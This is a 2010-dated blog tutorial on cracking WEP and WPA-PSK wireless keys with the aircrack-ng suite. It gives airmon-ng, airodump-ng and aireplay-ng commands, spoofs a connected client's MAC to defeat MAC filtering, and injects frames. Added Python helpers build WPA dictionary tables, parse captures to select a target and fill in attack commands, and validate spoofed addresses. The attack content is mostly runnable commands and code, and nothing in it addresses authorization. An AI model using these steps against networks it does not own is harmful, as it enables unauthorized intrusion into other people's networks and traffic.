Saturday, September 25, 2010

Crack Wireless~ WEP / WPA key with Aircrack-ng suite


This tip walks through a simple case of cracking a WEP or WPA-PSK key. The aim is to familiarize you with the weaknesses of wireless networks. It requires an 802.11b/g card with drivers that support packet injection (patched for it, if necessary).

Introduction of tools

•Airmon-ng
Puts your wireless network card into monitor mode (provided the card and driver support it!). The original note calls it unnecessary because airodump-ng handles this by itself, but the procedure below runs it explicitly, since every later step assumes a monitor-mode interface.

•airodump-ng
Airodump-ng discovers the wireless networks around you and captures their traffic. That capture is what aircrack-ng needs to recover the key: a large number of IVs for WEP, or the client's four-way handshake for WPA-PSK.

•aireplay-ng
Injects frames to stimulate traffic from the AP (Access Point). This is usually necessary to collect enough IVs to break a WEP key in a reasonable time.

•airolib-ng
Manages a database of ESSIDs and precomputed PMKs (the "hash table"). Because the expensive part of a WPA-PSK dictionary attack is deriving the PMK for each passphrase, computing it once per ESSID and storing it saves aircrack-ng a great deal of time.

•packetforge-ng
Forges packets (an ARP request in our case, but other types are available). Combined with aireplay-ng injection, it lets us inject crafted packets that generate exactly the traffic we want.

•Aircrack-ng
Aircrack-ng implements the FMS attack (and later ones such as KoreK and PTW). It recovers WEP keys from the captured IVs and WPA-PSK passphrases from a captured handshake by dictionary attack.
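To make the airolib-ng entry above concrete, here is what its table actually holds. WPA-PSK derives the 256-bit Pairwise Master Key as PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes), so every dictionary guess costs 4096 iterations of HMAC-SHA1 (8192 in fact, since the 32-byte output needs two SHA1-sized blocks). The PMK depends only on the passphrase and the ESSID, which is why a table computed once for an ESSID can be reused against any capture of that network, and why it is useless for another ESSID. This is an added example, not code from the post or from the aircrack-ng project; the wordlist is constructed, and the "password"/"IEEE" pair is the published 802.11i test vector.

```python
import hashlib


def pmk(passphrase, essid):
    """WPA-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), 4096, 32)


def build_table(essid, wordlist):
    """The slow part, done once per ESSID: passphrase -> PMK.

    This is the (essid, passphrase, pmk) relation that airolib-ng stores.
    The cheap step that follows, deriving the PTK from each PMK and checking
    the MIC on the captured handshake, is left to aircrack-ng and not
    reproduced here.
    """
    return {word: pmk(word, essid) for word in wordlist}


# Constructed mini wordlist, not a real dictionary.
WORDLIST = ["letmein", "password", "qwerty123"]

if __name__ == "__main__":
    table = build_table("IEEE", WORDLIST)
    print("PMK for 'password' on ESSID 'IEEE':", table["password"].hex())
    # Same passphrase, different ESSID: a different PMK, so the table is per ESSID.
    print("reusable for ESSID 'IEEE2'?", pmk("password", "IEEE") == pmk("password", "IEEE2"))
```

Running it prints the spec vector f42c6fc5…a12e and "False" for the second line: an airolib-ng table built for one ESSID has to be rebuilt for any other, which is why the tool is most worthwhile against common default ESSIDs.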

Configure the card in monitor mode

Run airmon-ng. If your card does not appear in its output, sort out the driver and interface configuration before going any further.
airmon-ng

Once your wireless network card is displayed, select the monitoring mode by typing:
airmon-ng start my_card_wlan

my_card_wlan is your wireless network interface (e.g. rausb0, ra0, wifi0, wlan0). airmon-ng reports the monitor-mode interface it enabled; with some drivers this is a new interface name (such as mon0), in which case use that name in the commands that follow.


Finding networks

First, take an inventory of the networks around you.
airodump-ng my_card_wlan

Once the target network is identified, run airodump-ng again, telling it exactly which network and channel to listen on:
airodump-ng -w datafile -d BSSID -c channel_number my_card_wlan


-w datafile writes the capture to files whose names start with datafile (datafile-01.cap, datafile-01.csv, ...). Remember where they are: the .cap file is what aircrack-ng reads.
-d BSSID restricts the capture to the given BSSID.
-c channel_number locks the card to that channel, so no IVs are lost while it hops.

Once your list in hand, note the important information:
•ESSID (the network name) of the AP.
•BSSID (the MAC address) of the AP.
•STATION: a client connected to the network (note its MAC address!).
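Reading those three values off the airodump-ng screen is error-prone when a dozen networks are in range; the same information is in the datafile-01.csv that -w writes, which has an AP table, a blank line, then a station table. The helper below (an added example, not code from the post or from the aircrack-ng project) picks the target AP by ESSID, lists the stations associated with it, and prints the capture and fake-authentication commands used later in this post with the values filled in. The CSV text, MACs and names inside it are constructed sample data, not a real capture; the interface name wlan0 is an assumption.

```python
import csv
import io

# Constructed sample of an airodump-ng CSV (airodump-ng -w datafile writes
# datafile-01.csv in this shape).  Every MAC, name and count here is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-09-25 10:00:00, 2010-09-25 10:05:00,  6,  54, WEP, WEP, , -40,  120,  3000,   0.  0.  0.  0,   6, TARGET,
66:77:88:99:AA:BB, 2010-09-25 10:00:00, 2010-09-25 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,   80,     0,   0.  0.  0.  0,   8, NEIGHBOR,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-09-25 10:00:30, 2010-09-25 10:05:00, -50,  500, 00:11:22:33:44:55, TARGET
AA:BB:CC:DD:EE:02, 2010-09-25 10:01:00, 2010-09-25 10:04:00, -60,   20, (not associated), TARGET,NEIGHBOR
"""


def _table(block):
    """Parse one CSV table (header row + data rows) into a list of dicts."""
    rows = [[f.strip() for f in r] for r in csv.reader(io.StringIO(block)) if r]
    header, body = rows[0], rows[1:]
    out = []
    for r in body:
        d = dict(zip(header, r))
        # "Probed ESSIDs" is itself comma separated; keep everything past the
        # last named column together instead of silently dropping it.
        if len(r) > len(header):
            d[header[-1]] = ",".join(r[len(header) - 1:])
        out.append(d)
    return out


def parse_airodump_csv(text):
    """airodump-ng writes the AP table, a blank line, then the station table."""
    ap_block, _, sta_block = text.partition("\n\n")
    return _table(ap_block), _table(sta_block)


def find_target(text, essid):
    """Pick out the AP named `essid` and the stations associated with it."""
    aps, stations = parse_airodump_csv(text)
    matches = [ap for ap in aps if ap["ESSID"] == essid]
    if not matches:
        raise LookupError("ESSID %r not seen in this capture" % essid)
    ap = matches[0]
    # Unassociated stations carry "(not associated)" in the BSSID column.
    clients = [s["Station MAC"] for s in stations
               if s["BSSID"].lower() == ap["BSSID"].lower()]
    return {"essid": essid, "bssid": ap["BSSID"], "channel": int(ap["channel"]),
            "privacy": ap["Privacy"], "clients": clients}


def commands(target, iface, prefix="datafile"):
    """The post's next two commands with the captured values filled in."""
    cmds = ["airodump-ng -w %s -d %s -c %d %s"
            % (prefix, target["bssid"], target["channel"], iface)]
    # Fake authentication is a WEP step.  Reuse an associated client's MAC if
    # there is one (it is certainly allowed through any MAC filter), else your own.
    mac = target["clients"][0] if target["clients"] else "YOUR_OWN_MAC"
    if target["privacy"] == "WEP":
        cmds.append("aireplay-ng -1 0 -e %s -a %s -h %s %s"
                    % (target["essid"], target["bssid"], mac, iface))
    return cmds


if __name__ == "__main__":
    t = find_target(SAMPLE_CSV, "TARGET")
    print(t)
    for c in commands(t, "wlan0"):
        print(c)
```

Point it at your own datafile-01.csv by replacing SAMPLE_CSV with the file's contents. Note that real ESSIDs may contain commas, which this simple reader does not handle.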

Changing MAC address

This preliminary step lets you bypass MAC filtering, which some APs apply as a security measure (it is not often used, though). Several methods are available; in every case the interface must be down first: ifconfig your_interface down. The address must be six octets and unicast (an even first octet); 02:... is a locally administered address, which is the conventional way to mark a made-up one. To defeat a filter, use the MAC of a client that is already allowed, i.e. the STATION noted above.
•ifconfig
ifconfig --help
ifconfig [interface] hw ether 02:23:45:67:89:ab
•ip
ip --help
ip link set [interface] address 02:23:45:67:89:ab
•macchanger
macchanger --help
macchanger -m 02:23:45:67:89:ab [interface]

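
Two things make a spoofed address fail silently or with a bare "Invalid argument": an address with the wrong number of octets, and one whose first octet has the individual/group bit (bit 0) set, which makes it a multicast address that the Linux kernel refuses as an interface address. The checker below is an added example, not code from the post or from any of the tools above; it validates an address before you hand it to ifconfig, ip or macchanger, and generates a random locally administered unicast one (bit 1 set, bit 0 clear) when you just need something that is not your real MAC.

```python
import os
import re

# Six hex octets separated by ':' or '-'.
_MAC_RE = re.compile(r"^([0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2}$")


def check_mac(mac):
    """Return (ok, reason) for an address you intend to assign to an interface."""
    if not _MAC_RE.match(mac):
        return False, "expected six hex octets separated by ':'"
    first = int(mac[:2], 16)
    if first & 0x01:
        # I/G bit set: a group (multicast) address, never valid as a source MAC.
        return False, "first octet has the group (multicast) bit set"
    if first & 0x02:
        return True, "unicast, locally administered"
    return True, "unicast, globally unique OUI"


def random_local_mac(rng=os.urandom):
    """A random unicast, locally administered MAC (xx:xx:xx:xx:xx:xx with x2/x6/xA/xE first)."""
    b = bytearray(rng(6))
    b[0] = (b[0] & 0xFC) | 0x02   # clear the I/G bit, set the U/L bit
    return ":".join("%02x" % x for x in b)


if __name__ == "__main__":
    for candidate in ("01:23:45:67:89", "01:23:45:67:89:ab", "02:23:45:67:89:ab"):
        print(candidate, check_mac(candidate))
    print("random:", random_local_mac())
```

The first two candidates are rejected (five octets; multicast first octet), the third is accepted. When the goal is to slip past a MAC filter rather than merely hide your own address, skip the random generator and copy the STATION address from airodump-ng instead.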
Packet Injection

This is the delicate stage of the procedure: generating traffic. Against WEP we boost the traffic as much as we can to collect IVs; against WPA, by contrast, only a little traffic is needed, since one client association (the four-way handshake) is enough.

WEP

If no station is connected, use the fragmentation attack (aireplay-ng -5) to obtain keystream you can feed to packetforge-ng.


Authentication

The first step for successful injection is to associate with the AP, otherwise it ignores our packets (come back to this step if the IV count does not rise).
aireplay-ng -1 0 -e ESSID -a BSSID -b BSSID -h MAC_CLIENT my_card_wlan
MAC_CLIENT is the MAC address of a station connected to the AP (your own if no station is connected!). Note: for all the aireplay-ng commands, if you specify the ESSID you can omit the BSSID-related options (-a, -b, ...).

If "Association successful" does not appear, the AP may be rejecting aireplay-ng's frames, or the allowed MAC address you are using may already be connected.
In that case try this alternative, which is the one offered on the official site.
aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -h MAC_CLIENT my_card_wlan
6000: re-authenticate every 6000 seconds. The long period keeps the association alive while keep-alive packets are sent (see -q).
-o 1: send only one set of packets at a time; the default of several packets confuses some APs.
-q 10: send keep-alive packets every 10 seconds.

~thanX for Reading~
